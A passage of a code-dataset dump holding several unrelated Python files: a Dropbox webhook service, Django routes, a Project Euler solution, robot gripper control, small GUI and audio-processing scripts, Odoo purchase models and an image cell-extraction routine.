None:\n\tsys.exit('DROPBOX_MONITOR_FOLDOER is not specified')\n\napp = Flask(__name__)\napp.debug = True\n\n# A random secret used by Flask to encrypt session data cookies\napp.secret_key = env('FLASK_SECRET_KEY')\nif app.secret_key is None:\n\tsys.exit('FLASK_SECRET_KEY is not specified')\n\ndef process_files(account):\n\t'''Call /files/list_folder for the given user ID and process any changes.'''\n\n\t# cursor for the user (None the first time)\n\tcursor = redis_client.hget('dbx_cursors', account+\"__\"+DROPBOX_MONITOR_FOLDOER)\n\n\tdbx = Dropbox(DROPBOX_TOKEN)\n\thas_more = True\n\n\twhile has_more:\n\t\tif cursor is None:\n\t\t\tresult = dbx.files_list_folder(path=DROPBOX_MONITOR_FOLDOER, recursive=True)\n\t\telse:\n\t\t\tresult = dbx.files_list_folder_continue(cursor.decode('utf-8'))\n\n\t\t#print(result)\n\t\tfor entry in result.entries:\n\t\t\t# Ignore deleted files, folders, and non-markdown files\n\t\t\tif (isinstance(entry, DeletedMetadata) or\n\t\t\t\tisinstance(entry, FolderMetadata) or\n\t\t\t\tnot entry.path_lower.endswith('.srt')):\n\t\t\t\tprint(\"Ignore file:\"+entry.path_display)\n\t\t\t\tcontinue\n\n\t\t\t# Write to SQS queue\n\t\t\tprint(\"Found file:\"+entry.path_display)\n\t\t\tresponse = sqs.send_message(\n\t\t\t\tQueueUrl=SQS_QUEUE_URL,\n\t\t\t\tMessageBody=json.dumps({\n\t\t\t\t\t'source': 'dropbox-otter-transcript-webhook',\n\t\t\t\t\t'entry': {\n\t\t\t\t\t\t'dropbox_id':entry.id,\n\t\t\t\t\t\t'path_lower':entry.path_lower,\n\t\t\t\t\t\t'path_display':entry.path_display\n\t\t\t\t\t}\n\t\t\t\t})\n\t\t\t)\n\t\t\tprint('SQS message for ' + entry.path_display + ' has been sent with id ' + response.get('MessageId'))\n\t\t\t\n\t\t# Update cursor\n\t\tcursor = result.cursor\n\t\tredis_client.hset('dbx_cursors', account+\"__\"+DROPBOX_MONITOR_FOLDOER, cursor)\n\n\t\t# Repeat only if there's more to do\n\t\thas_more = result.has_more\n\n@app.route('/')\ndef index():\n\treturn \"OK\"\n\n@app.route('/robots.txt')\ndef static_from_root():\n\treturn send_from_directory(app.static_folder, request.path[1:])\n\n@app.route('/webhook', methods=['GET'])\ndef challenge():\n\t'''Respond to the webhook challenge (GET request) by echoing back the challenge parameter.'''\n\n\tresp = Response(request.args.get('challenge'))\n\tresp.headers['Content-Type'] = 'text/plain'\n\tresp.headers['X-Content-Type-Options'] = 'nosniff'\n\n\treturn 
resp\n\n@app.route('/webhook', methods=['POST'])\ndef webhook():\n\t'''Receive a list of changed user IDs from Dropbox and process each.'''\n\n\t# Make sure this is a valid request from Dropbox\n\tsignature = request.headers.get('X-Dropbox-Signature').encode(\"utf-8\")\n\tdigested_signature = hmac.new(bytes(DROPBOX_APP_SECRET,'utf-8'), request.data, sha256).hexdigest().encode()\n\tif not hmac.compare_digest(signature, digested_signature):\n\t\tabort(403)\n\n\tfor account in json.loads(request.data)['list_folder']['accounts']:\n\t\t# We need to respond quickly to the webhook request, so we do the\n\t\t# actual work in a separate thread. For more robustness, it's a\n\t\t# good idea to add the work to a reliable queue and process the queue\n\t\t# in a worker process.\n\t\tprocess_files(account)\n\treturn 'Received'\n\nif __name__=='__main__':\n\tif PORT is not None:\n\t\tapp.run(debug=True, threaded=True, port=PORT)\n\telse:\n\t\tapp.run(debug=True, threaded=True)\n","sub_path":"dropbox_otter_transcript_webhook.py","file_name":"dropbox_otter_transcript_webhook.py","file_ext":"py","file_size_in_byte":4631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"158870624","text":"from django.conf.urls import url\n\nfrom cdh.views.guest import trangchu, danhmuc, khoahoc, baiviet, index, lienhe\n\nurlpatterns = [\n url(r'^$', index.index),\n url(r'^lienhe', lienhe.index, name='lienhe'),\n url(r'^trangchu', trangchu.index, name='trangchu'),\n url(r'^danhmuc/(?P[0-9]+)/', danhmuc.index),\n url(r'^khoahoc/(?P[0-9]+)/', khoahoc.index),\n url(r'^baiviet/(?P[0-9]+)/', baiviet.index),\n url(r'^login', index.index),\n]","sub_path":"cdh/urls/guest.py","file_name":"guest.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"234816523","text":"#The prime factors of 13195 are 5, 7, 13 and 29.\n#What is the largest prime factor of the number 600851475143 ?\nimport math\nimport math\nimport timeit\nimport numpy as np\n\nprimes = []\ndef Esieve(n): \n # Create a boolean array \"prime[0..n]\" and initialize \n # all entries it as true. A value in prime[i] will \n # finally be false if i is Not a prime, else true. 
\n    prime = [True for i in range(n+1)] \n    p = 2\n    while (p * p <= n): \n\n        # If prime[p] is not changed, then it is a prime \n        if (prime[p] == True): \n\n            # Update all multiples of p \n            for i in range(p * p, n+1, p): \n                prime[i] = False\n        p += 1\n\n    # Collect all prime numbers up to n \n    for p in range(2, n): \n        if prime[p]: \n            primes.append(p)\n\ndef factor(num):\n    fact = []\n    for p in primes:\n        while num % p == 0:\n            fact.append(p)\n            num = num // p\n    if num == 1:\n        print(max(fact))\nEsieve(10000)\nfactor(600851475143)\n\n\n","sub_path":"Project Euler/Complete/003_Largest_prime_factor.py","file_name":"003_Largest_prime_factor.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"474370557","text":"import sim\nimport sys\nimport time\nimport math\n\n\ndef gripper(j1,j2, clientID, close):\n    if(close == True):\n        sim.simxSetJointTargetVelocity(clientID, j2,0.04, sim.simx_opmode_oneshot)\n    else:\n        sim.simxSetJointTargetVelocity(clientID, j2,-0.04, sim.simx_opmode_oneshot)\n    r, p2 = sim.simxGetJointPosition(clientID, j2,sim.simx_opmode_oneshot)\n    sim.simxSetJointTargetPosition(clientID,j1, p2*-1, sim.simx_opmode_oneshot)\n\n\nprint ('Programa inicio')\nsim.simxFinish(-1)  # close all open connections\n# Connect to CoppeliaSim\nclientID=sim.simxStart('127.0.0.1',19999,True,True,5000,5)\nif clientID!=-1:\n    print ('Conectado al API del servidor remoto')\n\n    _, M1 =sim.simxGetObjectHandle(clientID, 'youBotArmJoint0', sim.simx_opmode_blocking)\n    _, M2 =sim.simxGetObjectHandle(clientID, 'youBotArmJoint1', sim.simx_opmode_blocking)\n    _, M3 =sim.simxGetObjectHandle(clientID, 'youBotArmJoint2', sim.simx_opmode_blocking)\n    _, M4 =sim.simxGetObjectHandle(clientID, 'youBotArmJoint3', sim.simx_opmode_blocking)\n    _, M5 =sim.simxGetObjectHandle(clientID, 'youBotArmJoint4', sim.simx_opmode_blocking)\n    sim.simxSetJointPosition(clientID, M1,0*math.pi/180,sim.simx_opmode_streaming)\n    sim.simxSetJointPosition(clientID, M2,0*math.pi/180,sim.simx_opmode_streaming)\n    sim.simxSetJointPosition(clientID, M3,0*math.pi/180,sim.simx_opmode_streaming)\n    sim.simxSetJointPosition(clientID, M4,0*math.pi/180,sim.simx_opmode_streaming)\n    sim.simxSetJointPosition(clientID, M5,0*math.pi/180,sim.simx_opmode_streaming)\n\n    _, j1 =sim.simxGetObjectHandle(clientID, 'youBotGripperJoint1', sim.simx_opmode_blocking)\n    _, j2 =sim.simxGetObjectHandle(clientID, 'youBotGripperJoint2', sim.simx_opmode_blocking)\n\n    for i in range(5):\n        print(\"Abrir\")\n        gripper(j1, j2, clientID, True)\n        time.sleep(2)\n        print(\"Cerrar\")\n        gripper(j1, j2, clientID, False)\n        time.sleep(2)\n\n\n    #sim.simxSetJointTargetVelocity(clientID, j1,-0.02, sim.simx_opmode_blocking)\n\n    print(\"velocidad\")\n    time.sleep(1)\n    # Now close the connection to CoppeliaSim:\n    sim.simxFinish(clientID)\nelse:\n    sys.exit('Fallo conectando al API del servidor remoto')\nprint ('Programa finalizado')\n","sub_path":"movimiento_basic.py","file_name":"movimiento_basic.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +
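A short usage sketch for the tridiagonal solver defined in the algorithm.py record above (seq_id 426994520). This is an illustration only, not part of the dataset: the module name `algorithm` is assumed from that record's file name, and the 4x4 system is invented so the exact solution is all ones.

import numpy as np

from algorithm import algo, matrix_to_3list  # assumed import path, mirroring the record's file name

# Diagonally dominant 4x4 tridiagonal system; exact solution is x = [1, 1, 1, 1].
A = np.array([[2.0, 1.0, 0.0, 0.0],
              [1.0, 3.0, 1.0, 0.0],
              [0.0, 1.0, 3.0, 1.0],
              [0.0, 0.0, 1.0, 2.0]])
d = np.array([3.0, 5.0, 5.0, 3.0])

a, b, c = matrix_to_3list(A)   # sub-, main- and super-diagonal vectors of A
x = algo(a, b, c, d)           # forward elimination + back substitution (Thomas algorithm)
print(np.allclose(A @ x, d))   # expected output: True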
self.label1=tk.Label(self.ventana1,text=\"Ingrese segundo valor:\")\n self.label1.grid(column=0, row=1)\n \n self.dato2=tk.StringVar()\n self.entry1=tk.Entry(self.ventana1, width=20, textvariable=self.dato2)\n self.entry1.grid(column=1, row=1)\n\n self.boton1=tk.Button(self.ventana1, text=\"Calcular\", command=self.calcular)\n self.boton1.grid(column=1, row=2)\n\n self.label2=tk.Label(self.ventana1,text=\"RESULTADO\")\n self.label2.grid(column=0, row=3)\n \n self.label3=tk.Label(self.ventana1,text=\"0\")\n self.label3.grid(column=1,row=3)\n self.ventana1.mainloop()\n\n def calcular(self):\n suma=int(self.dato1.get())+int(self.dato2.get())\n self.label3.configure(text=suma)\n\naplicacion1=Aplicacion()","sub_path":"ejercicio222.py","file_name":"ejercicio222.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"637377811","text":"from __future__ import print_function\n\nimport sys\nimport os\nimport time\n\nfrom PyQt5 import uic\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QApplication, QMainWindow\n\nfrom matplotlib.figure import Figure\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\n\nfrom skimage import io\nimport glob\n\nimport utils\n\nfrom matplotlib.widgets import RectangleSelector\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nbase_dir = os.path.dirname(os.path.abspath(__file__))\nui_path = os.path.join(base_dir, 'main.ui')\nUi_MainWindow, QtBaseClass = uic.loadUiType(ui_path)\n\n# Camera settings: 640x480, RGB32, 350fps\n\n# The robustness of the detector would really benefit from having a light on the ROI.\n\n# TODO add ROI selector.\n# Can display a single image from each step of the total sequence and select the ROI.\n# Just like I was hard coding, but this is more user friendly.\n# Have a step button to step through each photo in the sequence to make sure the ROI is in a good spot.\n# This is a hella good idea and really makes this project sing, baby.\n\n\nclass GlueApp(QMainWindow):\n def __init__(self):\n super(GlueApp, self).__init__()\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n\n self.ui.sequenceOpen.clicked.connect(sequenceOpen)\n self.ui.sequenceTrain.clicked.connect(createTrainSequence)\n self.ui.sequenceTest.clicked.connect(testNewSequence)\n self.ui.sequenceReset.clicked.connect(sequenceReset)\n\n\nclass TrainSequence:\n def __init__(self):\n self.main_roi = []\n self.train_roi = []\n self.train_sequence = []\n\n\nclass TestSequence:\n def __init__(self):\n self.main_roi = []\n self.test_sequence = []\n\n\ndef sequenceOpen(self):\n if plt.fignum_exists('Sequence Analysis'):\n print('Sequence Analysis window is already open.')\n else:\n plt.figure('Sequence Analysis')\n plt.clf()\n plt.show()\n\n\ndef createTrainSequence():\n # In the final version this function will bring up a UI to select main_roi and train_roi.\n # For now it is just hard-coded.\n dir_path = utils.getDirPath()\n rdl_120 = TrainSequence()\n rdl_120.main_roi = [0, 400, 130, 600]\n rdl_120.train_roi = [[0, 0, 0, 0],\n [175, 305, 170, 280],\n [165, 295, 180, 270],\n [170, 260, 235, 320],\n [150, 240, 245, 340],\n [115, 195, 100, 200],\n [50, 150, 255, 350],\n [70, 160, 255, 455]]\n for _, ((root, _, _), roi) in enumerate(zip(os.walk(dir_path), rdl_120.train_roi)):\n train_subsequence = []\n if root == dir_path:\n continue\n else:\n for image_path in glob.glob(root + '/*.bmp'):\n image = io.imread(image_path)\n crop_image = 
image[rdl_120.main_roi[0]:rdl_120.main_roi[1],\n rdl_120.main_roi[2]:rdl_120.main_roi[3]]\n train_template = crop_image[roi[0]:roi[1], roi[2]:roi[3]]\n train_subsequence.append(train_template)\n rdl_120.train_sequence.append(train_subsequence)\n utils.saveTrainSequence(rdl_120)\n\n# DEVELOPMENT\ndef ccreateTrainSequence():\n dir_path = utils.getDirPath()\n\n setup_figure = plt.figure('Sequence Setup')\n plt.clf()\n setup_axes = setup_figure.add_subplot(1, 1, 1)\n\n rdl_120 = TrainSequence()\n rdl_120.main_roi = [0, 400, 130, 600]\n rdl_120.train_roi = [0, 0, 0, 0]\n\n for _, ((root, _, _), roi) in enumerate(zip(os.walk(dir_path), rdl_120.train_roi)):\n train_subsequence = []\n if root == dir_path:\n continue\n else:\n toggle_selector.RS = RectangleSelector(setup_axes, line_select_callback,\n drawtype='box', useblit=True,\n # don't use middle button\n button=[1, 3],\n minspanx=5, minspany=5,\n spancoords='pixels',\n interactive=True)\n plt.connect('key_press_event', toggle_selector)\n plt.show()\n utils.saveTrainSequence(rdl_120)\n\n\ndef line_select_callback(eclick, erelease):\n 'eclick and erelease are the press and release events'\n col_1, row_1 = eclick.xdata, eclick.ydata\n col_2, row_2 = erelease.xdata, erelease.ydata\n print(\"(%3.2f, %3.2f) --> (%3.2f, %3.2f)\" % (col_1, row_1, col_2, row_2))\n print(\" The button you used were: %s %s\" %\n (eclick.button, erelease.button))\n\n\ndef toggle_selector(event):\n print(' Key pressed.')\n if event.key in ['Q', 'q'] and toggle_selector.RS.active:\n print(' RectangleSelector deactivated.')\n toggle_selector.RS.set_active(False)\n if event.key in ['A', 'a'] and not toggle_selector.RS.active:\n print(' RectangleSelector activated.')\n toggle_selector.RS.set_active(True)\n\n\ndef createTestSequence():\n dir_path = utils.getDirPath()\n #dir_path = 'C:/Users/dcallaway/Documents/rdl120_sequences/test'\n test_sequence = TestSequence()\n test_sequence.main_roi = [0, 400, 130, 600]\n for _, (root, _, _) in enumerate(os.walk(dir_path)):\n test_subsequence = []\n if root == dir_path:\n continue\n else:\n for image_path in glob.glob(root + '/*.bmp'):\n image = io.imread(image_path)\n crop_image = image[test_sequence.main_roi[0]:test_sequence.main_roi[1],\n test_sequence.main_roi[2]:test_sequence.main_roi[3]]\n test_subsequence.append(crop_image)\n test_sequence.test_sequence.append(test_subsequence)\n return test_sequence\n\n# TODO add sequence pause on fail, but include button to resume sequence\n\n\ndef testNewSequence():\n test_sequence = createTestSequence()\n tic = time.time()\n train_sequence = utils.loadTrainSequence()\n sequence_figure = plt.figure('Sequence Analysis')\n plt.clf()\n sequence_axes = sequence_figure.add_subplot(1, 1, 1)\n match_thresh = 0.92\n loc_thresh = 17\n for i, (template_list, image_list) in enumerate(zip(train_sequence.train_sequence, test_sequence.test_sequence)):\n step_num = i+1\n template_roi = train_sequence.train_roi[step_num]\n print('')\n print('Running step number:', step_num)\n for j, (template, image) in enumerate(zip(template_list, image_list)):\n img_num = j+1\n match_coeff, rect_shape = utils.templateMatch(template, image)\n row_index, col_index, template_width, template_height = rect_shape\n max_loc_diff = utils.locationCheck(template_roi, rect_shape)\n if match_coeff < match_thresh or max_loc_diff > loc_thresh:\n match_rect_face = patches.Rectangle((col_index, row_index), template_width, template_height,\n fill=True, facecolor='Blue', alpha=0.2)\n match_rect_edge = patches.Rectangle((col_index, row_index), 
template_width, template_height,\n fill=False, edgecolor='Red', linewidth=3)\n print('')\n print('Match failed!')\n print('Step number:', step_num)\n print('Image number:', img_num)\n if match_coeff < match_thresh:\n print('Match coefficient:', match_coeff)\n if max_loc_diff > loc_thresh:\n print('Max location difference:', max_loc_diff)\n else:\n match_rect_face = patches.Rectangle((col_index, row_index), template_width, template_height,\n fill=True, facecolor='Blue', alpha=0.2)\n match_rect_edge = patches.Rectangle((col_index, row_index), template_width, template_height,\n fill=False, edgecolor='Green', linewidth=3)\n # print('Match coefficient:', match_coeff)\n sequence_axes.cla()\n sequence_axes.imshow(image)\n sequence_axes.add_patch(match_rect_face)\n sequence_axes.add_patch(match_rect_edge)\n if step_num == len(train_sequence.train_sequence) and img_num == len(template_list):\n print('')\n print('Testing complete!')\n print('Elapsed time:', time.time()-tic)\n plt.show()\n else:\n plt.pause(0.5)\n\n\ndef sequenceReset(self):\n plt.figure('Sequence Analysis')\n plt.clf()\n plt.show()\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n mainWin = GlueApp()\n mainWin.show()\n sys.exit(app.exec_())\n","sub_path":"glue_genie/application/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"539931500","text":"from odoo import api, fields, models, _\n\n\nclass PurchaseOrder(models.Model):\n _inherit = 'purchase.order'\n\n contract_id = fields.Many2one('purchase.contract', string=\"Purchase Contract\", readonly=True,\n states={'draft': [('readonly', False)]}, )\n purchase_contract_id_line = fields.Many2one('purchase.contract.line', string=\"Purchase Contract Line\",\n states={'draft': [('readonly', False)]},\n readonly=True)\n\n def action_view_invoice(self):\n res = super(PurchaseOrder, self).action_view_invoice()\n for rec in self:\n res['context']['default_contract_id'] = rec.contract_id.id\n return res\n\n def button_cancel(self):\n res = super(PurchaseOrder, self).button_cancel()\n all_qty = []\n for rec in self:\n # rec.purchase_contract_id_line.purchase_created = False\n for line in rec.order_line:\n all_qty.append(line.product_qty)\n # rec.contract_id.ship_qty -= sum(all_qty)\n rec.contract_id.po_qty -= sum(all_qty)\n return res\n\n def button_confirm(self):\n res = super(PurchaseOrder, self).button_confirm()\n all_qty = []\n for rec in self:\n for line in rec.order_line:\n all_qty.append(line.product_qty)\n rec.contract_id.po_qty += sum(all_qty)\n return res\n\n # doaa added\n def btn_advance_payment(self):\n date = ''\n if self.date_approve:\n date = self.date_approve\n if self.date_order:\n date = self.date_order\n ctx = {'default_payment_type': 'outbound',\n 'default_partner_id': self.partner_id.id,\n 'default_partner_type': 'supplier',\n 'search_default_outbound_filter': 1,\n 'res_partner_search_mode': 'supplier',\n 'default_currency_id': self.currency_id.id,\n 'default_payment_date': date,\n 'default_contract_id': self.contract_id.id,\n 'default_purchase_id': self.id,\n 'default_communication': self.name,\n 'default_payment_method_id': self.env.ref('account.account_payment_method_manual_out').id,\n 'active_ids': [],\n 'active_model': self._name,\n 'active_id': self.id,\n }\n\n return {'name': _(\"Advance Payment\"),\n 'type': 'ir.actions.act_window',\n 'view_mode': 'form',\n 'res_model': 'account.payment',\n 'target': 'new',\n 'view_id': 
self.env.ref(\n 'xs_purchase_advance_payment.view_purchase_advance_account_payment_form').id,\n 'context': ctx}\n\n\nclass PurchaseOrderLine(models.Model):\n _inherit = 'purchase.order.line'\n\n contract_id = fields.Many2one('purchase.contract', string=\"Purchase Contract\", related='order_id.contract_id',\n readonly=True, store=True)\n purchase_contract_id_line = fields.Many2one('purchase.contract.line', related='order_id.purchase_contract_id_line',\n string=\"Purchase Contract Line\"\n , readonly=True, store=True)\n payment_to_link = fields.Float(sring=\"Payment To Link\")\n account_payment_ids = fields.Many2many('account.payment', string=\"Payments\", compute='compute_account_payment_ids')\n account_payment_id = fields.Many2one('account.payment', string=\"Payments\")\n\n @api.depends('order_id.account_payment_ids', 'contract_id.account_payment_ids')\n def compute_account_payment_ids(self):\n for po_line in self:\n payments_obj = self.env['account.payment'].search([('partner_id', '=', po_line.partner_id.id)])\n payments = []\n # for rec in po_line.order_id.account_payment_ids:\n # payments.append(rec.id)\n for pay in payments_obj:\n payments.append(pay.id)\n po_line.account_payment_ids = [(6, 0, payments)]\n","sub_path":"purchase_contract_management/models/purchase_order.py","file_name":"purchase_order.py","file_ext":"py","file_size_in_byte":4141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"73316156","text":"\n\"\"\"\nDescription: Real time dynamic range compression (DRC) (stereo)\n Based on Digital Dynamic Range Compressor Design - A Tutorial and Analysis, Giannoulis et al. 2012\n\nAuthor: Adrien Llave - CentraleSupelec\nDate: 23/02/2018\n\nVersion: 1.0\n\nDate | Auth. | Version | Comments\n23/02/12 ALl 1.0 Initialization\n\n\"\"\"\n\nimport pyaudio\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport src.pkg.RTAudioProc as rt\n\n\nCHANNELS = 2\nRATE = 48000\nsamp_per_buffer = 10\n\ncomp_enable = 1\n\nthrsh = -30\nratio = 10\ntime_attack = 0.005\ntime_release = 2\nkneeWidth = 3\n\np = pyaudio.PyAudio()\n\n\ndef callback(in_data, frame_count, time_info, status):\n\n # ------------------------------------------------------------\n # ----------------- INPUT DECODING\n npdata_in = rt.decode(in_data, CHANNELS)\n\n # ------------------------------------------------------------\n # ----------------- COMPRESSION\n npdata_out = compressor.process(npdata_in)\n # ------------------------------------------------------------\n # ----------------- OUTPUT ENCODING\n data = rt.encode(npdata_out)\n\n return data, pyaudio.paContinue\n\n# ----------------------------------------------------------------\n\n\ncompressor = rt.Compressor(samp_per_buffer, CHANNELS, thrsh, ratio, time_attack, time_release, kneeWidth)\n\n# STREAM\nstream = p.open(format=pyaudio.paInt16,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n output=True,\n # input_device_index=16,\n # output_device_index=16,\n frames_per_buffer=samp_per_buffer,\n stream_callback=callback)\n\nstream.start_stream()\n\ngain_red_db_plt = np.mean(compressor.gain_db, axis=0)\n\nplt.ion()\nfig = plt.figure()\n#\nax = fig.add_subplot(2, 2, 1)\nline1, = ax.plot(gain_red_db_plt, 'ro')\nplt.axis([0, 1, -10, 0])\n#\n# ax2 = fig.add_subplot(222)\n# plt.axis([0, samp_per_buffer, -1, 1])\n# line2, = ax2.plot(npdata_in[:, 1], 'b-')\n#\n# ax3 = fig.add_subplot(223)\n# plt.axis('equal')\n# plt.axis([-60, 0, -60, 0])\n# ax3.grid(color='black', linestyle='-', linewidth=1)\n# line3, = 
ax3.plot(npdata_in[:, 1], npdata_out[:, 1], 'ro')\n# line4, = ax3.plot(np.arange(-60, 0.0, 1), np.arange(-60, 0.0, 1), '-b')\n\nwhile stream.is_active():\n time.sleep(0.1)\n gain_red_db_plt = np.mean(compressor.gain_db, axis=0)\n # mean_datainp = np.mean(20 * np.log10(np.absolute(npdata_in[:, :] / np.power(2, 16))), axis=0)\n # mean_dataout = np.mean(20 * np.log10(np.absolute(npdata_out[:, :] / np.power(2, 16))), axis=0)\n line1.set_ydata(gain_red_db_plt)\n # line2.set_ydata(npdata_in[:, 0] / np.power(2, 16))\n # line3.set_xdata(mean_datainp)\n # line3.set_ydata(mean_dataout)\n fig.canvas.draw()\n\nstream.stop_stream()\nstream.close()\n\np.terminate()\n\n","sub_path":"RTAudioProc/tests/test_DRC.py","file_name":"test_DRC.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"88177866","text":"from data import dataset\n\n\n# Create a validators package and write functions that validate all of the data. Import those functions.\n\nfrom validators.lib import getUserEmail\nfrom validators.lib import getProductPrice\nfrom validators.lib import getProductName\n\n\nfrom task1 import addUserProduct\n\n\n# Write a function that stores information about a user's purchase of a product in a dictionary.\n# All data is entered by the user. Use the validators. Call the validators.\n\ndef addUserProductValidator():\n\n\n\n user_email = getUserEmail()\n while not user_email:\n print('Error')\n user_email = getUserEmail()\n\n\n\n product_name = getProductName()\n while not product_name:\n print('Error')\n product_name = getProductName()\n\n\n\n product_price_str = getProductPrice()\n while not product_price_str:\n print('Error')\n product_price_str = getProductPrice()\n product_price = float(product_price_str)\n\n\n addUserProduct(user_email, product_name, product_price)\n\n\n\nprint(\"Task 2\")\naddUserProductValidator()\nprint(dataset)\n\n\nprint(\"\\n\\n\")","sub_path":"1/programm/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"341463744","text":"from __future__ import print_function\nimport os\nimport sys\n\nPWD = os.getcwd()\ntarget_filename = \"2020-01-24-CS:GO---Quick-Configuration.md.hidden\"\ntarget_file = os.path.join(PWD, \"..\", target_filename)\n\ndef main():\n included_bash_cnt = {2, 3}\n\n bash_cnt = 0\n in_bash = False\n with open(target_file) as f:\n for line in f:\n line = line.strip()\n if len(line) == 0 or line[0:2] == \"//\":\n continue\n elif line[0:3] == \"```\":\n if \"bash\" in line:\n bash_cnt += 1\n in_bash = True\n else:\n in_bash = False\n elif in_bash and bash_cnt in included_bash_cnt:\n ind = line.find(\"//\")\n if ind == -1:\n print(line, end=\";\")\n else:\n print(line[:ind].strip(), end=\";\")\n print(\"\\n\\nDone!\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"_posts/.scripts/generate-config.py","file_name":"generate-config.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"507485903","text":"\"\"\"\r\nCopyright 2017 Matthew W. 
Allen\r\n\r\nLicensed under the Apache License, Version 2.0 (the \"License\");\r\nyou may not use this file except in compliance with the License.\r\nYou may obtain a copy of the License at\r\n\r\n http://www.apache.org/licenses/LICENSE-2.0\r\n\r\nUnless required by applicable law or agreed to in writing, software\r\ndistributed under the License is distributed on an \"AS IS\" BASIS,\r\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\nSee the License for the specific language governing permissions and\r\nlimitations under the License.\r\n\"\"\"\r\nimport time\r\nfrom copy import copy\r\nimport cv2\r\nimport numpy as np\r\nimport os\r\nimport Machine_Learning.Lymphoma.Region_Filter as rFilter\r\n\r\nparams = [11, 68, 236, 0.46394341374428594, 0.20434550448034017, 200, 1, 0.32948156997486944, 5]\r\n\r\n\"\"\"\r\n Function to extract cells from a normalized image taken through holographic microscopy.\r\n @param sourceImage: The hologram image.\r\n @param reference: The reference image for the hologram.\r\n @param params: A tuple containing the parameters for the MSER blob detection algorithm.\r\n @param imName: The name to use when saving the image after cells have been detected.\r\n @param cellName: The beginning of the naming convention for saving individual regions. Should be left as is unless\r\n picking up from a previous detection process.\r\n @param flter: An instance of a Convolutional Neural Network that has been trained to classify small regions\r\n as cells or not cells.\r\n @param show: Flag for displaying the image in a window after cell extraction.\r\n @param classify: Flag to decide whether or not the CNN filter should be used on the regions.\r\n\"\"\"\r\n\r\n\r\ndef extract_regions(sourceImg, reference, params, imName, cellName=\"a0\", flter=None, show=False, classify=False):\r\n t1 = time.time()\r\n sourceImg = sourceImg.astype('float32')\r\n reference = reference.astype('float32')\r\n # Copy normalized image and set it to be what is effectively a bitmap with 1 = np.power(2,16)-1 and 0 = 0.\r\n img = np.divide(sourceImg, reference)\r\n # For all pixels, if a pixel is >= one third of the current maximum pixel value, set it \"on\" at np.power(2,16)-1.\r\n # Otherwise set it \"off\" at 0.\r\n img *= np.power(2, 16) - 1\r\n img = img.astype('uint16')\r\n vis = None\r\n if show or classify:\r\n # Copy of image for display purposes.\r\n vis = sourceImg.copy()\r\n vis = np.divide(vis, 256)\r\n vis = vis.astype('uint8')\r\n vis = cv2.cvtColor(vis, cv2.COLOR_GRAY2BGR)\r\n if classify and flter is None:\r\n # Create a filter CNN if none has been passed and classification is necessary.\r\n print(\"Creating filter.\")\r\n flter = rFilter.filter_CNN()\r\n bboxes = []\r\n print(\"Detecting contours...\")\r\n if show:\r\n # Run MSER algorithm on image and save boundary box data for each contour it finds.\r\n hulls = MSER_blobs(img, params, display=vis)\r\n else:\r\n hulls = MSER_blobs(img,params)\r\n\r\n # For all contours detected by MSER.\r\n for cnt in hulls:\r\n # Find and save the minimally sized boundary box around each contour.\r\n x, y, w, h = cv2.boundingRect(cnt)\r\n bboxes.append([x, y, x + w, y + h])\r\n\r\n print(\"Suppressing\",len(bboxes),\"boxes...\")\r\n # Perform non-max suppression on boundary boxes with overlap threshold = 0.2.\r\n bboxes = np.asarray(bboxes)\r\n bboxes = non_max_suppression_fast(bboxes, 0.2)\r\n\r\n # Expand is the number of pixels in width and height the box will increase before cropping.\r\n regions = []\r\n cells = []\r\n 
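# (Added note, not in the original source.) Each box that survives suppression below is grown to a fixed\r\n    # 64x64 crop by reshapeBox() and given a spreadsheet-style name by name_region() ('a0' -> 'b0' -> ... -> 'z0' -> 'a1');\r\n    # every crop is stored in regions, and also in cells whenever the CNN filter classifies it as a cell.\r\n    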
